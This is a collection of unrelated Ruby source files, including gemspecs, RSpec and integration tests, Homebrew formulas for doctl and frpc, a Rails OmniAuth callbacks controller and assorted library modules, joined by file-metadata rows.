s.files = ["README.md", "COPYING", "CHANGELOG", "lib/bcrypt/engine.rb", "lib/bcrypt/error.rb", "lib/bcrypt/password.rb", "lib/bcrypt.rb", "ext/mri/extconf.rb"]
s.homepage = "https://github.com/codahale/bcrypt-ruby"
s.licenses = ["MIT"]
s.rdoc_options = ["--title", "bcrypt-ruby", "--line-numbers", "--inline-source", "--main", "README.md"]
s.require_paths = ["lib"]
s.rubygems_version = "1.8.24"
s.summary = "OpenBSD's bcrypt() password hashing algorithm."
# Dependency declarations, guarded for very old RubyGems versions.
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake-compiler>, ["~> 0.9.2"])
s.add_development_dependency(%q<rspec>, [">= 3"])
s.add_development_dependency(%q<rdoc>, ["~> 3.12"])
else
s.add_dependency(%q<rake-compiler>, ["~> 0.9.2"])
s.add_dependency(%q<rspec>, [">= 3"])
s.add_dependency(%q<rdoc>, ["~> 3.12"])
end
else
s.add_dependency(%q<rake-compiler>, ["~> 0.9.2"])
s.add_dependency(%q<rspec>, [">= 3"])
s.add_dependency(%q<rdoc>, ["~> 3.12"])
end
end
| 45.8 | 221 | 0.646288 |
214217ae3ecefce528eb96ee2f379cfbbbe60201 | 6,135 | require 'test_helper'
require 'active_record'
Mongo.setup!
# Integration test: Elasticsearch::Model.search across multiple model
# classes (two ActiveRecord models, plus a Mongoid model when a MongoDB
# connection is available). Requires a live Elasticsearch cluster.
module Elasticsearch
module Model
class MultipleModelsIntegration < Elasticsearch::Test::IntegrationTestCase
context "Multiple models" do
setup do
# In-memory schema for the two ActiveRecord models under test.
ActiveRecord::Schema.define(:version => 1) do
create_table :episodes do |t|
t.string :name
t.datetime :created_at, :default => 'NOW()'
end
create_table :series do |t|
t.string :name
t.datetime :created_at, :default => 'NOW()'
end
end
# Shared concern: wires Elasticsearch indexing with a common mapping.
module ::NameSearch
extend ActiveSupport::Concern
included do
include Elasticsearch::Model
include Elasticsearch::Model::Callbacks
settings index: {number_of_shards: 1, number_of_replicas: 0} do
mapping do
indexes :name, type: 'string', analyzer: 'snowball'
indexes :created_at, type: 'date'
end
end
end
end
class ::Episode < ActiveRecord::Base
include NameSearch
end
class ::Series < ActiveRecord::Base
include NameSearch
end
# Seed each model with three documents and refresh its index.
[::Episode, ::Series].each do |model|
model.delete_all
model.__elasticsearch__.create_index! force: true
model.create name: "The #{model.name}"
model.create name: "A great #{model.name}"
model.create name: "The greatest #{model.name}"
model.__elasticsearch__.refresh_index!
end
end
should "find matching documents across multiple models" do
response = Elasticsearch::Model.search(%q<"The greatest Episode"^2 OR "The greatest Series">, [Series, Episode])
assert response.any?, "Response should not be empty: #{response.to_a.inspect}"
assert_equal 2, response.results.size
assert_equal 2, response.records.size
assert_instance_of Elasticsearch::Model::Response::Result, response.results.first
assert_instance_of Episode, response.records.first
assert_instance_of Series, response.records.last
assert_equal 'The greatest Episode', response.results[0].name
assert_equal 'The greatest Episode', response.records[0].name
assert_equal 'The greatest Series', response.results[1].name
assert_equal 'The greatest Series', response.records[1].name
end
should "provide access to results" do
response = Elasticsearch::Model.search(%q<"A great Episode"^2 OR "A great Series">, [Series, Episode])
assert_equal 'A great Episode', response.results[0].name
assert_equal true, response.results[0].name?
assert_equal false, response.results[0].boo?
assert_equal 'A great Series', response.results[1].name
assert_equal true, response.results[1].name?
assert_equal false, response.results[1].boo?
end
# A hit whose database record has been deleted is dropped from .records
# while still counted in .results.
should "only retrieve records for existing results" do
::Series.find_by_name("The greatest Series").delete
::Series.__elasticsearch__.refresh_index!
response = Elasticsearch::Model.search(%q<"The greatest Episode"^2 OR "The greatest Series">, [Series, Episode])
assert response.any?, "Response should not be empty: #{response.to_a.inspect}"
assert_equal 2, response.results.size
assert_equal 1, response.records.size
assert_instance_of Elasticsearch::Model::Response::Result, response.results.first
assert_instance_of Episode, response.records.first
assert_equal 'The greatest Episode', response.results[0].name
assert_equal 'The greatest Episode', response.records[0].name
end
# Mixed ORM search only runs when MongoDB is reachable.
if Mongo.available?
Mongo.connect_to 'mongoid_collections'
context "Across mongoid models" do
setup do
class ::Image
include Mongoid::Document
include Elasticsearch::Model
include Elasticsearch::Model::Callbacks
field :name, type: String
attr_accessible :name if respond_to? :attr_accessible
settings index: {number_of_shards: 1, number_of_replicas: 0} do
mapping do
indexes :name, type: 'string', analyzer: 'snowball'
indexes :created_at, type: 'date'
end
end
def as_indexed_json(options={})
as_json(except: [:_id])
end
end
Image.delete_all
Image.__elasticsearch__.create_index! force: true
Image.create! name: "The Image"
Image.create! name: "A great Image"
Image.create! name: "The greatest Image"
Image.__elasticsearch__.refresh_index!
Image.__elasticsearch__.client.cluster.health wait_for_status: 'yellow'
end
should "find matching documents across multiple models" do
response = Elasticsearch::Model.search(%q<"greatest Episode" OR "greatest Image"^2>, [Episode, Image])
assert response.any?, "Response should not be empty: #{response.to_a.inspect}"
assert_equal 2, response.results.size
assert_equal 2, response.records.size
assert_instance_of Elasticsearch::Model::Response::Result, response.results.first
assert_instance_of Image, response.records.first
assert_instance_of Episode, response.records.last
assert_equal 'The greatest Image', response.results[0].name
assert_equal 'The greatest Image', response.records[0].name
assert_equal 'The greatest Episode', response.results[1].name
assert_equal 'The greatest Episode', response.records[1].name
end
end
end
end
end
end
end
| 37.181818 | 122 | 0.599348 |
acaf0492e74010af0e856457e52568435ddbf005 | 1,876 | require_relative 'skyscanner_api'
module Skyscanner
  # Wraps a raw Skyscanner "browse quotes" payload and resolves the numeric
  # carrier and place ids embedded in each quote into human-readable names.
  class FlightInfo
    # Array of quote hashes whose OutboundLeg CarrierIds/OriginId/DestinationId
    # have been replaced with names.
    attr_reader :flightInfo

    # originData - parsed API response containing 'Carriers', 'Places'
    # and 'Quotes' collections.
    def initialize(originData)
      carriers_by_id = carrier_names_by_id(originData)
      places_by_id = station_names_by_id(originData)
      @flightInfo = resolve_quotes(carriers_by_id, places_by_id, originData)
    end

    # Fetches quote data from the Skyscanner API and wraps it in a FlightInfo.
    def self.find(market:, currency:, locale:, originPlace:, destinationPlace:, outboundPartialDate:)
      originData = SkyscannerApi.getOriginData(market, currency, locale, originPlace, destinationPlace, outboundPartialDate)
      new(originData)
    end

    private

    # Maps CarrierId => carrier name.
    def carrier_names_by_id(originData)
      originData['Carriers'].each_with_object({}) do |carrier, names|
        names[carrier['CarrierId']] = carrier['Name']
      end
    end

    # Maps PlaceId => place name, considering only 'Station' entries.
    def station_names_by_id(originData)
      originData['Places'].each_with_object({}) do |place, names|
        names[place['PlaceId']] = place['Name'] if place['Type'] == 'Station'
      end
    end

    # Replaces the ids inside each quote's OutboundLeg with resolved names and
    # returns the (mutated) quotes array.
    # BUG FIX: the original iterated `for i in 0..CarrierIds.length`, one index
    # past the end, which appended a spurious nil entry to CarrierIds; map!
    # walks exactly the existing elements.
    def resolve_quotes(carriers_by_id, places_by_id, originData)
      originData['Quotes'].each do |quote|
        leg = quote['OutboundLeg']
        leg['CarrierIds'].map! { |id| carriers_by_id[id] }
        leg['OriginId'] = places_by_id[leg['OriginId']]
        leg['DestinationId'] = places_by_id[leg['DestinationId']]
      end
    end
  end
end
| 31.266667 | 124 | 0.668977 |
1abb96206eb5260c8a7d6747967ab4276fbf3d86 | 195 | Rails.application.routes.draw do
# Entries exist only nested under a workout; workouts expose no routes of
# their own. create_from_nickname is a collection-level POST.
resources :workouts, only: [] do
  resources :entries, only: %i[index create destroy] do
    collection do
      post :create_from_nickname
    end
  end
end
end
| 24.375 | 60 | 0.687179 |
87e6578c0236a8918a6c95d3c2bc4f13e31b1a16 | 641 | # frozen_string_literal: true
RSpec.describe FiniteMachine::HookEvent, "#new" do
  it "reads event name" do
    event = described_class.new(:green, :go, :green)

    expect(event.name).to eql(:green)
  end

  it "reads event type" do
    event = described_class.new(:green, :go, :green)

    expect(event.type).to eql(FiniteMachine::HookEvent)
  end

  it "reads the from state" do
    event = described_class.new(:green, :go, :red)

    expect(event.from).to eql(:red)
  end

  it "freezes object" do
    event = described_class.new(:green, :go, :green)

    expect(event.frozen?).to eq(true)
  end
end
| 26.708333 | 60 | 0.697348 |
ab57ce6c2f0c132de62840291b3a121f5e385b37 | 510 | module BetterRecord
# Mixin that lazily exposes BetterRecord's configured attributes as reader
# methods on both instances and (via the included hook) the including class.
module InjectMethods
  def self.included(base)
    base.extend self
  end

  # On first access to a configured attribute, defines a real method on the
  # receiver's class so later calls skip method_missing entirely, then
  # delegates to BetterRecord. Unknown names fall through to super.
  def method_missing(method, *args, &block)
    name = method.to_sym
    if BetterRecord.attributes[name]
      self.class.define_method(name) { BetterRecord.__send__(name) }
      BetterRecord.__send__(name)
    else
      super
    end
  rescue NoMethodError
    # Preserves the original behavior: any NoMethodError raised while
    # delegating falls back to the default missing-method handling.
    super
  end

  # FIX: method_missing without respond_to_missing? breaks respond_to? and
  # Method#method for the dynamically served attributes.
  def respond_to_missing?(method, include_private = false)
    BetterRecord.attributes[method.to_sym] ? true : super
  rescue NoMethodError
    super
  end
end
end
| 21.25 | 49 | 0.598039 |
1c97d934ea81934859142094d1438c07a0f29fb7 | 172 | # frozen_string_literal: true
module Alchemy
  VERSION = "6.0.0-rc2"

  class << self
    # The Alchemy version as a plain string.
    def version
      VERSION
    end

    # The version wrapped in a Gem::Version, handy for comparisons.
    def gem_version
      Gem::Version.new(VERSION)
    end
  end
end
| 12.285714 | 29 | 0.69186 |
1d3c588af023921e6d3cb5496dd0974a6979ae0b | 187 |
# One-off data migration: strips the "nhs-" prefix from specialist sector
# tags for NHS population screening programmes attached to an edition.
SpecialistSector.where(['edition_id IS NOT NULL AND tag LIKE ?', 'nhs-population-screening-programmes%']).each do |sector|
  # \A anchors at the start of the string, so only a leading "nhs-" is removed.
  sector.tag = sector.tag.sub(/\Anhs-/, '')
  sector.save!
end
| 31.166667 | 122 | 0.705882 |
e25b8842072d2e6e116a063f33cfd5316311fade | 68 | def init
super
sections.last.place(:specs).before(:source)
end
| 11.333333 | 45 | 0.720588 |
acdfbe33a6fb67afe9961066ec7bd85834838a31 | 5,806 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataFactory::Mgmt::V2018_06_01
  module Models
    #
    # Execute data flow activity.
    #
    class ExecuteDataFlowActivity < ExecutionActivity

      include MsRestAzure

      # Sets the polymorphic discriminator used during (de)serialization to
      # select this activity type.
      def initialize
        @type = "ExecuteDataFlow"
      end

      attr_accessor :type

      # @return [DataFlowReference] Data flow reference.
      attr_accessor :data_flow

      # @return [DataFlowStagingInfo] Staging info for execute data flow
      # activity.
      attr_accessor :staging

      # @return [IntegrationRuntimeReference] The integration runtime
      # reference.
      attr_accessor :integration_runtime

      # @return [ExecuteDataFlowActivityTypePropertiesCompute] Compute
      # properties for data flow activity.
      attr_accessor :compute


      #
      # Mapper for ExecuteDataFlowActivity class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      # NOTE: auto-generated mapper — regenerate rather than hand-editing.
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'ExecuteDataFlow',
          type: {
            name: 'Composite',
            class_name: 'ExecuteDataFlowActivity',
            model_properties: {
              additional_properties: {
                client_side_validation: true,
                required: false,
                type: {
                  name: 'Dictionary',
                  value: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'ObjectElementType',
                    type: {
                      name: 'Object'
                    }
                  }
                }
              },
              name: {
                client_side_validation: true,
                required: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              description: {
                client_side_validation: true,
                required: false,
                serialized_name: 'description',
                type: {
                  name: 'String'
                }
              },
              depends_on: {
                client_side_validation: true,
                required: false,
                serialized_name: 'dependsOn',
                type: {
                  name: 'Sequence',
                  element: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'ActivityDependencyElementType',
                    type: {
                      name: 'Composite',
                      class_name: 'ActivityDependency'
                    }
                  }
                }
              },
              user_properties: {
                client_side_validation: true,
                required: false,
                serialized_name: 'userProperties',
                type: {
                  name: 'Sequence',
                  element: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'UserPropertyElementType',
                    type: {
                      name: 'Composite',
                      class_name: 'UserProperty'
                    }
                  }
                }
              },
              type: {
                client_side_validation: true,
                required: true,
                serialized_name: 'type',
                type: {
                  name: 'String'
                }
              },
              linked_service_name: {
                client_side_validation: true,
                required: false,
                serialized_name: 'linkedServiceName',
                type: {
                  name: 'Composite',
                  class_name: 'LinkedServiceReference'
                }
              },
              policy: {
                client_side_validation: true,
                required: false,
                serialized_name: 'policy',
                type: {
                  name: 'Composite',
                  class_name: 'ActivityPolicy'
                }
              },
              data_flow: {
                client_side_validation: true,
                required: true,
                serialized_name: 'typeProperties.dataFlow',
                default_value: {},
                type: {
                  name: 'Composite',
                  class_name: 'DataFlowReference'
                }
              },
              staging: {
                client_side_validation: true,
                required: false,
                serialized_name: 'typeProperties.staging',
                type: {
                  name: 'Composite',
                  class_name: 'DataFlowStagingInfo'
                }
              },
              integration_runtime: {
                client_side_validation: true,
                required: false,
                serialized_name: 'typeProperties.integrationRuntime',
                type: {
                  name: 'Composite',
                  class_name: 'IntegrationRuntimeReference'
                }
              },
              compute: {
                client_side_validation: true,
                required: false,
                serialized_name: 'typeProperties.compute',
                type: {
                  name: 'Composite',
                  class_name: 'ExecuteDataFlowActivityTypePropertiesCompute'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 31.215054 | 76 | 0.44609 |
1808085838c9df8cef1dca9b9cfb333768a06481 | 288 | class ChangeEventInitToDefault < ActiveRecord::Migration[4.2]
def up
change_column :events, :visible, :boolean, null: false, default: true
execute "UPDATE events SET visible = true WHERE visible IS NULL"
end
def down
raise ActiveRecord::IrreversibleMigration
end
end
| 26.181818 | 73 | 0.746528 |
287f4ae4e7f8592a31fd41f38825eca9fdedb00b | 2,615 | require 'spec_helper'
describe HawatelPS::Windows::ProcTable do
let(:win32_data) { FactoryGirl.build(:win32_data) }
before do
allow(HawatelPS::Windows::ProcFetch).to receive(:get_process).and_return(Array.new([win32_data[:proc_attrs]]))
end
it "return all process instances" do
process = HawatelPS::Windows::ProcTable.proc_table
expect(process[0].processid).to match(/^[0-9]+$/)
end
it "return proc attributes" do
process = HawatelPS::Windows::ProcTable.proc_table
expect(process[0].each).to be_a(Enumerator)
end
it "search process by name" do
process = HawatelPS::Windows::ProcTable.search_by_name('rubymine.exe')
expect(process[0].processid).to match(/^[0-9]+$/)
end
it "search process by name using regex" do
process = HawatelPS::Windows::ProcTable.search_by_name('/^ruby/')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by name using regex with raise error" do
process = HawatelPS::Windows::ProcTable.search_by_name('/^jasdfsdfva/')
expect { process[0].pid }.to raise_error(NoMethodError)
end
it "search process by pid" do
process = HawatelPS::Windows::ProcTable.search_by_pid(9336)
expect(process.processid).to eq('9336')
end
it "search process by condition == " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'processid', :oper => '==', :value => '9336')
expect(process[0].processid).to eq('9336')
end
it "search process by condition <= " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '<=', :value => '437301248')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition >= " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '>=', :value => '200000')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition != " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '!=', :value => '200000')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition > " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '>', :value => '200000')
expect(process[0].processid).to match(/^[0-9]*$/)
end
it "search process by condition < " do
process = HawatelPS::Windows::ProcTable.search_by_condition(:attr => 'workingsetsize', :oper => '<', :value => '537301248')
expect(process[0].processid).to match(/^[0-9]*$/)
end
end | 36.830986 | 128 | 0.676482 |
bb465cc4ea45abb3e7aee3731c85696e8f7b73c4 | 1,595 | class Doctl < Formula
desc "Command-line tool for DigitalOcean"
homepage "https://github.com/digitalocean/doctl"
url "https://github.com/digitalocean/doctl/archive/v1.40.0.tar.gz"
sha256 "2a1877097183b9a47bad7a0942174b4a98ad6182db29d7d76720ee709fcf4c02"
head "https://github.com/digitalocean/doctl.git"
bottle do
cellar :any_skip_relocation
sha256 "0d2e9299897198232be035d7f9e44548f1f30a4fd6017a985171f62ca8726432" => :catalina
sha256 "1447c8b1ccf051028d66a0f2f40a5a741120a1a179daea3af2c71cf6aeb935e1" => :mojave
sha256 "5f16e005f514d492247a90d4eec34af46485d6ae4012e48324476967656cc97b" => :high_sierra
sha256 "47bbaa82affdca1a9d47724be2af87c98ac62bfe07af407b58311553b3ca3476" => :x86_64_linux
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
doctl_version = version.to_s.split(/\./)
src = buildpath/"src/github.com/digitalocean/doctl"
src.install buildpath.children
src.cd do
base_flag = "-X github.com/digitalocean/doctl"
ldflags = %W[
#{base_flag}.Major=#{doctl_version[0]}
#{base_flag}.Minor=#{doctl_version[1]}
#{base_flag}.Patch=#{doctl_version[2]}
#{base_flag}.Label=release
].join(" ")
system "go", "build", "-ldflags", ldflags, "-o", bin/"doctl", "github.com/digitalocean/doctl/cmd/doctl"
end
(bash_completion/"doctl").write `#{bin}/doctl completion bash`
(zsh_completion/"_doctl").write `#{bin}/doctl completion zsh`
end
test do
assert_match "doctl version #{version}-release", shell_output("#{bin}/doctl version")
end
end
| 36.25 | 109 | 0.721003 |
4a959535f238a26320d3158876ae2edb1ae9f774 | 9,998 | class Auth::OmniauthCallbacksController < Devise::OmniauthCallbacksController
# Disable CSRF since the token information is lost.
skip_before_action :verify_authenticity_token
# ==> Failure route.
def failure
# Find the error message and log it for analysis.
error_message = failure_message ||
request.params['error_description'] ||
I18n.t('devise.omniauth_callbacks.unknown_failure')
logger.error error_message
# Show a flash message and redirect.
flash_failure error_message
redirect_to root_path
end
# ==> Provider callbacks.
def google_oauth2
auth_hash[:info][:institution] = auth_hash.extra[:raw_info][:hd]
generic_oauth
end
def office365
generic_oauth
end
def lti
try_login!
end
def oidc
try_login!
end
def saml
try_login!
end
def smartschool
generic_oauth
end
private
# ==> Authentication logic.
def generic_oauth
return provider_missing! if oauth_provider_id.blank?
# Find the provider for the current institution. If no provider exists yet,
# a new one will be created.
return redirect_with_flash!(I18n.t('auth.sign_in.errors.institution-creation')) if provider.blank?
try_login!
end
def try_login!
# Ensure that an appropriate provider is used.
return redirect_to_preferred_provider! if provider.redirect?
# Find the identity.
identity, user = find_identity_and_user
if identity.blank?
# If no identity was found and the provider is a link provider, prompt the
# user to sign in with a preferred provider.
return redirect_to_preferred_provider! if provider.link?
# Create a new user and identity.
user = User.new institution: provider&.institution if user.blank?
identity = user.identities.build identifier: auth_uid, provider: provider
end
# Validation.
raise 'Identity should not be nil here' if identity.nil?
# Update the user information from the authentication response.
user.update_from_provider(auth_hash, provider)
return redirect_with_errors!(user) if user.errors.any?
# Link the stored identifier to the signed in user.
create_linked_identity!(user)
# User successfully updated, finish the authentication procedure. Force is
# required to overwrite the current existing user.
sign_in user, event: :authentication, force: true
# Redirect the user to their destination.
redirect_to_target!(user)
end
# ==> Utilities.
def create_linked_identity!(user)
# Find the link provider and uid in the session.
link_provider_id = session.delete(:auth_link_provider_id)
link_uid = session.delete(:auth_link_uid)
return if link_provider_id.blank? || link_uid.blank?
# Find the actual provider.
link_provider = Provider.find(link_provider_id)
return if link_provider.blank?
# Create the identity for the current user.
Identity.create(identifier: link_uid, provider: link_provider, user: user)
if session[:hide_flash].blank?
# Set a flash message.
set_flash_message :notice, :linked
end
session.delete(:hide_flash)
end
def find_identity_and_user
# Attempt to find the identity by its identifier.
identity = Identity.find_by(identifier: auth_uid, provider: provider)
return [identity, identity.user] if identity.present? && auth_uid.present?
# No username was provided, try to find the user using the email address.
user = User.from_email(auth_email)
return [nil, nil] if user.blank?
# Find an identity for the user at the current provider.
[Identity.find_by(provider: provider, user: user), user]
end
def find_or_create_oauth_provider
# Find an existing provider.
provider_type = Provider.for_sym(auth_provider_type)
provider = provider_type.find_by(identifier: oauth_provider_id)
return provider if provider.present?
# Provider was not found. Currently, a new institution will be created for
# every new provider as well.
name, short_name = provider_type.extract_institution_name(auth_hash)
institution = Institution.new name: name,
short_name: short_name,
logo: "#{auth_provider_type}.png"
provider = institution.providers.build identifier: oauth_provider_id,
type: provider_type.name
if institution.save
institution_created
provider
else
institution_creation_failed institution.errors
nil
end
end
def flash_failure(reason)
return unless is_navigational_format?
# Get the provider type.
provider_type = auth_provider_type || request.env['omniauth.error.strategy']&.name || 'OAuth2'
set_flash_message :alert, :failure, kind: provider_type, reason: reason
flash[:extra] = { url: contact_path, message: I18n.t('pages.contact.prompt') }
end
def redirect_to_preferred_provider!
# Store the uid and the id of the current provider in the session, to link
# the identities after returning.
session[:auth_link_provider_id] = provider.id if provider.link?
session[:auth_link_uid] = auth_uid if provider.link?
# Find the preferred provider for the current institution.
preferred_provider = provider.institution.preferred_provider
# If this is the first time a user is logging in with LTI, we do something special: LTI
# related screens are often shown inside an iframe, which some providers don't support
# (for example, UGent SAML doesn't).
# We try our best to detect an iframe with the Sec-Fetch-Dest header, but at the time of
# writing, Firefox and Safari don't support it.
if auth_provider_type == Provider::Lti.sym && request.headers['Sec-Fetch-Dest'] != 'document'
# The header is nil, in which case we don't know if it is an iframe or not, or the header is
# "iframe", in which case we do know it is an iframe.
# Anyway, we save the original target, and redirect to a web page.
# We are not saving the entire URL, since this can be lengthy
# and cause problems overflowing the session.
session[:original_redirect] = URI.parse(target_path(:user)).path
redirect_to lti_redirect_path(sym: preferred_provider.class.sym, provider: preferred_provider)
else
# Redirect to the provider.
redirect_to omniauth_authorize_path(:user, preferred_provider.class.sym, provider: preferred_provider)
end
end
def redirect_with_errors!(resource)
logger.info "User was unable to login because of reason: '#{resource.errors.full_messages.to_sentence}'. More info about the request below:\n" \
"#{auth_hash.pretty_inspect}"
ApplicationMailer.with(authinfo: auth_hash, errors: resource.errors.inspect)
.user_unable_to_log_in
.deliver_later
first_error = resource.errors.first
if first_error.attribute == :institution && first_error.type.to_s == 'must be unique'
flash_wrong_provider provider, resource.identities.first.provider
redirect_to root_path
else
redirect_with_flash! resource.errors.full_messages.to_sentence
end
end
def redirect_with_flash!(message)
flash_failure message
redirect_to root_path
end
def flash_wrong_provider(tried_provider, user_provider)
set_flash_message :alert, :wrong_provider,
tried_provider_type: tried_provider.class.sym.to_s,
tried_provider_institution: tried_provider.institution.name,
user_provider_type: user_provider.class.sym.to_s,
user_institution: user_provider.institution.name
flash[:extra] = { message: I18n.t('devise.omniauth_callbacks.wrong_provider_extra', user_provider_type: user_provider.class.sym.to_s), url: omniauth_authorize_path(:user, user_provider.class.sym, provider: user_provider) }
end
def redirect_to_target!(user)
redirect_to target_path(user)
end
# ==> Shorthands.
def target_path(user)
auth_target || after_sign_in_path_for(user)
end
def auth_hash
request.env['omniauth.auth']
end
def auth_email
auth_hash.info.email
end
def auth_provider_type
return nil if auth_hash.blank?
auth_hash.provider.to_sym
end
def auth_redirect_params
auth_hash.extra[:redirect_params].to_h || {}
end
def auth_target
return nil if auth_hash.extra[:target].blank?
"#{auth_hash.extra[:target]}?#{auth_redirect_params.to_param}"
end
def auth_uid
auth_hash.uid
end
def oauth_provider
@oauth_provider ||= find_or_create_oauth_provider
end
def oauth_provider_id
auth_hash.info.institution
end
def provider
# Extract the provider from the authentication hash.
return auth_hash.extra.provider if [Provider::Lti.sym, Provider::Saml.sym].include?(auth_provider_type)
# Fallback to an oauth provider
oauth_provider
end
# ==> Event handlers.
def institution_created
logger.info "Institution with identifier #{oauth_provider_id} created (#{auth_provider_type}). " \
"See below for more info about the request:\n" \
"#{auth_hash.pretty_inspect}"
ApplicationMailer.with(authinfo: auth_hash)
.institution_created
.deliver_later
end
def institution_create_failed(errors)
logger.info "Failed to created institution with identifier #{oauth_provider_id} (#{auth_provider_type}). " \
"See below for more info about the request:\n" \
"#{auth_hash.pretty_inspect}" \
"#{errors}"
ApplicationMailer.with(authinfo: auth_hash, errors: errors.inspect)
.institution_creation_failed
.deliver_later
end
def provider_missing!
flash_failure I18n.t('auth.sign_in.errors.missing-provider')
redirect_to sign_in_path
end
end
| 32.888158 | 226 | 0.704441 |
e950c987b900f1d04550be5d332396760d4f69cd | 1,589 | module VagrantPlugins
module GuestRedHat
module Cap
class ChangeHostName
def self.change_host_name(machine, name)
comm = machine.communicate
if !comm.test("hostname -f | grep '^#{name}$'", sudo: false)
basename = name.split('.', 2)[0]
comm.sudo <<-EOH.gsub(/^ {14}/, '')
# Update sysconfig
sed -i 's/\\(HOSTNAME=\\).*/\\1#{name}/' /etc/sysconfig/network
# Update DNS
sed -i 's/\\(DHCP_HOSTNAME=\\).*/\\1\"#{basename}\"/' /etc/sysconfig/network-scripts/ifcfg-*
# Set the hostname - use hostnamectl if available
echo '#{name}' > /etc/hostname
if command -v hostnamectl; then
hostnamectl set-hostname --static '#{name}'
hostnamectl set-hostname --transient '#{name}'
else
hostname -F /etc/hostname
fi
# Remove comments and blank lines from /etc/hosts
sed -i'' -e 's/#.*$//' -e '/^$/d' /etc/hosts
# Prepend ourselves to /etc/hosts
grep -w '#{name}' /etc/hosts || {
sed -i'' '1i 127.0.0.1\\t#{name}\\t#{basename}' /etc/hosts
}
# Restart network (through NetworkManager if running)
if service NetworkManager status 2>&1 | grep -q running; then
service NetworkManager restart
else
service network restart
fi
EOH
end
end
end
end
end
end
| 33.808511 | 106 | 0.49528 |
03c9792ac486002a86eb908192bc5c365e3507a0 | 723 | module TrueSkill::MathGeneral
def ierfcc(p)
return -100 if p >= 2.0
return 100 if p <= 0.0
pp = p < 1.0 ? p : 2 - p
t = Math.sqrt(-2*Math.log(pp/2.0)) # Initial guess
x = -0.70711*((2.30753 + t*0.27061)/(1.0 + t*(0.99229 + t*0.04481)) - t)
[0,1].each do |j|
err = Math.erfc(x) - pp
x += err/(1.12837916709551257*Math.exp(-(x*x)) - x*err)
end
p < 1.0 ? x : -x
end
def cdf(x,mu=0,sigma=1)
return 0.5*Math.erfc(-(x-mu)/(sigma*Math.sqrt(2)))
end
def pdf(x,mu=0,sigma=1)
return (1/Math.sqrt(2*Math::PI)*sigma.abs)*Math.exp(-(((x-mu)/sigma.abs)**2/2))
end
def ppf(x,mu=0,sigma=1)
return mu-sigma*Math.sqrt(2)*ierfcc(2*x)
end
end
| 21.264706 | 83 | 0.53112 |
61ef8235ea3fece719d06b9fefa8b78a1718d1e8 | 2,223 | class Frpc < Formula
desc "Client app of fast reverse proxy to expose a local server to the internet"
homepage "https://github.com/fatedier/frp"
url "https://github.com/fatedier/frp.git",
tag: "v0.43.0",
revision: "fe5fb0326b2aa7741d5b5d8f8c4c3ca12bb4ed91"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "a85a02fbea44970f091539f3bdf90280f35993f866b943af012a43354769be64"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "a85a02fbea44970f091539f3bdf90280f35993f866b943af012a43354769be64"
sha256 cellar: :any_skip_relocation, monterey: "650e98414d94f8419f96af47497bdd9413e3e6c4816042e916678f167ec6b5a5"
sha256 cellar: :any_skip_relocation, big_sur: "650e98414d94f8419f96af47497bdd9413e3e6c4816042e916678f167ec6b5a5"
sha256 cellar: :any_skip_relocation, catalina: "650e98414d94f8419f96af47497bdd9413e3e6c4816042e916678f167ec6b5a5"
sha256 cellar: :any_skip_relocation, x86_64_linux: "38f7df2d38baa038e833fa6a3cf9b8b1dfc9019a6789bda6efba9e8da09c1dcb"
end
depends_on "go" => :build
def install
(buildpath/"bin").mkpath
(etc/"frp").mkpath
system "make", "frpc"
bin.install "bin/frpc"
etc.install "conf/frpc.ini" => "frp/frpc.ini"
etc.install "conf/frpc_full.ini" => "frp/frpc_full.ini"
end
service do
run [opt_bin/"frpc", "-c", etc/"frp/frpc.ini"]
keep_alive true
error_log_path var/"log/frpc.log"
log_path var/"log/frpc.log"
end
test do
assert_match version.to_s, shell_output("#{bin}/frpc -v")
assert_match "Commands", shell_output("#{bin}/frpc help")
assert_match "local_port", shell_output("#{bin}/frpc http", 1)
assert_match "local_port", shell_output("#{bin}/frpc https", 1)
assert_match "local_port", shell_output("#{bin}/frpc stcp", 1)
assert_match "local_port", shell_output("#{bin}/frpc tcp", 1)
assert_match "local_port", shell_output("#{bin}/frpc udp", 1)
assert_match "local_port", shell_output("#{bin}/frpc xtcp", 1)
assert_match "admin_port", shell_output("#{bin}/frpc status -c #{etc}/frp/frpc.ini", 1)
assert_match "admin_port", shell_output("#{bin}/frpc reload -c #{etc}/frp/frpc.ini", 1)
end
end
| 44.46 | 123 | 0.728745 |
5d5024d4ceeaaf51e9609f10e5599f9311c8b0c6 | 249 | class AdministrationsController < ApplicationController
def show
@administartion = Administration.find_by(id: params[:id])
@city = @administartion.city
if current_user.admin?
@suggestions = PendingSuggestion.all
end
end
end | 27.666667 | 61 | 0.738956 |
383cb970c3668037febc9dba1a68d7221d87794d | 725 | module ActionPanel
module Initializers
# Formtastic Initializers
module Formtastic
BASE_FILES = %w[wrapping html choices].freeze
INPUTS_FILES = %w[
select_input select2_input check_boxes_input radio_input
boolean_input switch_input file_input color_picker_input
date_picker_input just_datetime_picker_input hstore_input
rich_text_area_input password_input
].freeze
include Base
extend ActiveSupport::Concern
included do
initializer 'formtastic.overrides' do |_app|
require_each(BASE_FILES, path: 'formtastic/base')
